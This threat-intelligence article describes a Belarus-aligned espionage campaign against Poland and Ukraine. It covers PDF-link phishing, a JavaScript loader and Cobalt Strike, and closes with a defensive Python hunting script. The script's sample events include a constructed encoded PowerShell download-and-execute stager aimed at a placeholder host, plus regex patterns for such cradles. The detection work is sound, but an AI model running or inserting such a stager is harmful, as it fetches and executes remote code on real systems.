Belarusian APT 'FrostyNeighbor' Targets Poland and Ukraine with New Toolkit

Belarus-Aligned APT 'FrostyNeighbor' Deploys New JavaScript Loader in Attacks on Poland & Ukraine

Severity: HIGH
May 15, 2026
Threat Actor, Cyberattack, Threat Intelligence

Related Entities

Threat Actors

FrostyNeighbor, Ghostwriter, UNC1151, Storm-0257

Organizations

ESET

Other

PicassoLoader, Cobalt Strike, Ukrtelecom

Full Report

Executive Summary

ESET Research has identified a new cyber-espionage campaign conducted by FrostyNeighbor, a sophisticated advanced persistent threat (APT) group aligned with Belarus. The group, also widely known as Ghostwriter or UNC1151, is targeting governmental and military entities in Poland and Ukraine. This latest campaign, active since at least March 2026, demonstrates a significant evolution in the group's tactics. They have shifted from macro-based attacks to using spear-phishing emails with PDF lures that link to malicious infrastructure. A key innovation is the deployment of a new JavaScript version of their PicassoLoader downloader, which is ultimately used to install the Cobalt Strike beacon for long-term intelligence gathering.


Threat Overview

Threat Actor: FrostyNeighbor, a state-sponsored group attributed to Belarus. This group is well-known and tracked under multiple aliases, including Ghostwriter, UNC1151, Storm-0257, and TA445. Their primary objective is cyber-espionage and information operations, historically targeting NATO countries and nations critical of the Belarusian and Russian regimes.

Targets: The current campaign specifically targets government and military organizations in Poland and Ukraine, continuing the group's focus on entities relevant to the geopolitical conflict in Eastern Europe.

Attack Vector: The campaign begins with spear-phishing emails (T1566.002 - Spearphishing Link). The emails carry deliberately blurred PDF attachments that act as lures, impersonating legitimate organizations such as the Ukrainian telecommunications provider Ukrtelecom. The PDFs contain no macros; their only active element is a link that directs the victim to attacker-controlled infrastructure, so the malicious behaviour begins only after the user follows it.


Technical Analysis

This campaign showcases FrostyNeighbor's continuous adaptation to bypass security defenses.

  1. Initial Lure: Instead of traditional macro-enabled documents, the attackers use simple PDF files with embedded links. Because the PDF carries no macro or script, mail gateways and sandboxes tuned to flag malicious macros have nothing to detonate; the first malicious action is the victim's click on the link.

  2. Server-Side Validation: A notable TTP is the use of server-side victim validation. When a victim clicks the link, the attacker's server fingerprints the connecting system. If the system does not match the profile of a desired target (for example, it looks like a sandbox or a security researcher's machine), the final payload is not delivered. This selective delivery (T1608.004 - Stage Capabilities: Drive-by Target) makes the campaign harder to analyze and increases its operational security. A practical consequence for responders is that the lure PDF and the link alone do not reveal the payload: replaying the URL from an analysis environment will often return nothing or a benign decoy, so a "clean" detonation of the lure does not prove the targeted user received nothing.

  3. Evolved Payload: For validated targets, the server delivers a new JavaScript-based version of PicassoLoader, executed through the Windows Script Host (T1059.007 - JavaScript). This marks a shift from previous versions and is likely intended to evade signature-based detection written for the earlier variants. PicassoLoader acts as a downloader, responsible for fetching and executing the next stage of the attack.

  4. Final Payload: The ultimate goal is to deploy the Cobalt Strike beacon. This post-exploitation framework gives the attackers a wide range of capabilities for lateral movement, credential theft, and data exfiltration, enabling long-term espionage within the compromised network. The loader stage relies on PowerShell execution (T1059.001 - PowerShell) and obfuscated or encoded content (T1027 - Obfuscated Files or Information) to stage the beacon.


Impact Assessment

The primary goal of the FrostyNeighbor campaign is espionage. A successful breach of a government or military network in Poland or Ukraine could lead to:

  • Theft of Classified Information: Exfiltration of sensitive government documents, military plans, and intelligence reports.
  • Geopolitical Destabilization: The stolen information could be used for strategic advantage, to undermine diplomatic relations, or leaked as part of a disinformation campaign (a known tactic of Ghostwriter).
  • Long-Term Persistence: The use of Cobalt Strike allows the threat actor to establish a persistent foothold, providing continuous access to the compromised network for ongoing intelligence collection.

IOCs — Directly from Articles

No specific Indicators of Compromise (IPs, domains, hashes) were mentioned in the source articles.


Cyber Observables — Hunting Hints

Security teams may want to hunt for activity related to the FrostyNeighbor group. The following patterns could indicate related activity:

  • Email Security: Monitor for incoming emails containing PDF attachments with suspicious links, especially those impersonating known service providers like telecommunications companies.
  • Network Traffic: Look for outbound connections from user workstations to newly registered or uncategorized domains, which could be the C2 infrastructure for PicassoLoader or Cobalt Strike.
  • Endpoint Activity: Hunt for the execution of JavaScript files (.js) by wscript.exe or cscript.exe, especially when the file carries a Mark-of-the-Web (Zone.Identifier alternate data stream) indicating it was downloaded from the internet, sits in a Downloads or Temp directory, or has a browser, PDF reader or mail client in its process ancestry. Monitor for PowerShell execution patterns associated with Cobalt Strike loaders, such as hidden-window, no-profile and -EncodedCommand launches whose decoded content contains a download cradle.

Detection & Response

  • Email Filtering: Enhance email security gateways to scan PDFs for malicious links and to block emails from suspicious or newly registered domains.
  • Endpoint Detection (EDR): Use an EDR solution to monitor for suspicious script execution and process chains (e.g., Outlook.exe -> Acrobat.exe -> chrome.exe -> wscript.exe). Note that when the user saves the script and opens it from the browser's download list or from Explorer, the script host's parent is typically explorer.exe rather than the browser, so the chain should be evaluated on the script file's origin and full ancestry, not only on the immediate parent. D3FEND's Process Spawn Analysis is relevant here.
  • Network Egress Filtering: Restrict or monitor outbound connections to the internet from non-essential systems. Use a web proxy to inspect and control web traffic, blocking connections to known malicious or uncategorized sites.
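The hunting hints and the detection list above describe the same process chain from two angles. The following Python is an added example for this article, not ESET's or the article author's code, and runs a hunt for that chain over Sysmon-style process-creation records: a script host executing a .js file from a download or temp location or beneath a mail, PDF-reader or browser ancestor, followed by PowerShell launched with hidden-window and encoded-command flags whose decoded payload contains a download cradle. All events, paths, account names and the stage.example.invalid URL are constructed placeholders, not indicators from the campaign.

```python
"""Hunt Sysmon-style process-creation events for the PDF-link -> JavaScript loader
-> PowerShell chain described above. Added example for this article, not ESET's or
the author's code; every event below is constructed and the paths, accounts and the
stage.example.invalid URL are placeholders, not IOCs."""
import base64
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LURE_ORIGINS = {"outlook.exe", "acrobat.exe", "acrord32.exe",
                "chrome.exe", "msedge.exe", "firefox.exe"}
DOWNLOAD_DIRS = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\inetcache\\")
SCRIPT_EXT = re.compile(r"\.(js|jse|wsf|hta)\b", re.I)
# Download-cradle keywords typical of Cobalt Strike PowerShell stagers
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|"
                    r"invoke-expression|\biex\b|frombase64string|reflection\.assembly", re.I)
SUSPICIOUS_FLAGS = re.compile(
    r"-(nop|noprofile|w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass|"
    r"noni|noninteractive)\b", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def image_name(path):
    """Lower-case file name of a Sysmon Image/ParentImage path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE); None if absent/invalid."""
    match = ENCODED.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(event, by_pid, max_depth=8):
    """Parent, grandparent, ... image names, following ParentProcessId through by_pid."""
    names = [image_name(event["ParentImage"])]
    current = by_pid.get(event["ParentProcessId"])
    while current is not None and len(names) < max_depth:
        current = by_pid.get(current["ParentProcessId"])
        if current is not None:
            names.append(image_name(current["Image"]))
    return names


def assess(event, by_pid):
    """Reasons (possibly none) why one process-creation event fits the loader chain."""
    image, cmd = image_name(event["Image"]), event["CommandLine"]
    lineage = ancestry(event, by_pid)
    reasons = []
    script = SCRIPT_EXT.search(cmd)
    if image in SCRIPT_HOSTS and script:
        reasons.append("script host running a %s file" % script.group(0).lower())
        if any(d in cmd.lower() for d in DOWNLOAD_DIRS):
            reasons.append("script located in a download or temp directory")
        origins = [n for n in lineage if n in LURE_ORIGINS]
        if origins:
            reasons.append("mail/PDF/browser ancestor: " + " <- ".join(origins))
    if image in ("powershell.exe", "pwsh.exe"):
        if SUSPICIOUS_FLAGS.search(cmd):
            reasons.append("powershell with hidden-window/no-profile/bypass flags")
        decoded = decode_encoded_command(cmd)
        if decoded and CRADLE.search(decoded):
            reasons.append("encoded command contains a download cradle")
        if lineage[0] in SCRIPT_HOSTS:
            reasons.append("powershell spawned by " + lineage[0])
    return reasons


def hunt(events):
    """Run assess() over every event; return the ones that triggered, with reasons."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for event in events:
        reasons = assess(event, by_pid)
        if reasons:
            alerts.append({"pid": event["ProcessId"], "image": image_name(event["Image"]),
                           "reasons": reasons})
    return alerts


EXPLORER = r"C:\Windows\explorer.exe"
OUTLOOK = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
ACROBAT = r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed stager, base64(UTF-16LE) exactly as -EncodedCommand expects it
ENC_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/p')"
    .encode("utf-16le")).decode()


def _ev(pid, ppid, image, cmdline, parent_image, user="CORP\\jdoe"):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "CommandLine": cmdline, "ParentImage": parent_image, "User": user}


# Constructed Sysmon Event ID 1 style records; parents 4 and 800 are deliberately absent
SAMPLE_EVENTS = [
    _ev(100, 4, EXPLORER, "explorer.exe", r"C:\Windows\System32\userinit.exe"),
    _ev(200, 100, OUTLOOK, "OUTLOOK.EXE", EXPLORER),
    _ev(300, 200, ACROBAT, r'Acrobat.exe "C:\Users\jdoe\AppData\Local\Temp\blurred_document.pdf"', OUTLOOK),
    _ev(400, 300, CHROME, 'chrome.exe -- "http://stage.example.invalid/view"', ACROBAT),
    # loader executed straight from the browser's download into Temp
    _ev(510, 400, WSCRIPT, r'wscript.exe "C:\Users\jdoe\AppData\Local\Temp\document.js"', CHROME),
    # same loader double-clicked from Downloads: explorer.exe, not the browser, is the parent
    _ev(500, 100, WSCRIPT, r'"C:\Windows\System32\wscript.exe" "C:\Users\jdoe\Downloads\document.js"', EXPLORER),
    _ev(600, 500, POWERSHELL, "powershell.exe -nop -w hidden -enc " + ENC_CRADLE, WSCRIPT),
    # benign: scheduled licensing script and an interactive admin one-liner
    _ev(700, 800, r"C:\Windows\System32\cscript.exe",
        r"cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dli",
        r"C:\Windows\System32\svchost.exe", "NT AUTHORITY\\SYSTEM"),
    _ev(900, 100, POWERSHELL, "powershell.exe -Command Get-Date", EXPLORER),
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["pid"], alert["image"], "; ".join(alert["reasons"]))
```

Run stand-alone, the hunt flags the two wscript.exe launches and the encoded PowerShell, and ignores the .vbs licensing script and the plain Get-Date one-liner. The two wscript events are deliberately different: the one parented by chrome.exe is caught through its ancestry, while the one opened from Downloads has only explorer.exe above it and is caught by the file location, which is why the hunt scores on both signals rather than on the immediate parent alone. To use it on real data, replace SAMPLE_EVENTS with Sysmon Event ID 1 records exported from your SIEM; the field names used here (ProcessId, ParentProcessId, Image, ParentImage, CommandLine) are Sysmon's own.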

Mitigation

  • User Training: (M1017) Educate users about the risks of clicking links in unsolicited emails and attachments, even if they appear to be simple PDF documents.
  • Application Control: (M1038) Where possible, use application control solutions to restrict the execution of scripting engines like wscript.exe and cscript.exe for most users.
  • Network Segmentation: (M1030) Segment networks to limit an attacker's ability to move laterally if an initial compromise occurs.
  • PowerShell Hardening: Run PowerShell in Constrained Language Mode for standard users, and enable Script Block Logging (Event ID 4104) and Module Logging so that the decoded content of -EncodedCommand launches is recorded centrally and can be matched against download-cradle patterns, rather than only the opaque base64 seen on the command line.

Timeline of Events

March 1, 2026: The latest wave of attacks by FrostyNeighbor against Poland and Ukraine begins.
May 15, 2026: This article was published.

MITRE ATT&CK Mitigations

User Training (M1017): Train users to recognize and report phishing attempts, especially those using lures relevant to their work or region.

Restrict Web-Based Content (M1021): Use web proxies and DNS filtering to block access to newly registered or known malicious domains used for payload delivery.

Execution Prevention (M1038): Use application allowlisting to prevent the execution of unauthorized scripts and executables, including scripting engines like wscript.exe.

Antivirus/Antimalware (M1049): Ensure endpoint security solutions are up-to-date and configured to detect and block known loaders like PicassoLoader and post-exploitation frameworks like Cobalt Strike.


Article Author

Jason Gomes, Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Tags

FrostyNeighbor, Ghostwriter, APT, Belarus, Ukraine, Poland, PicassoLoader, Cobalt Strike, Espionage
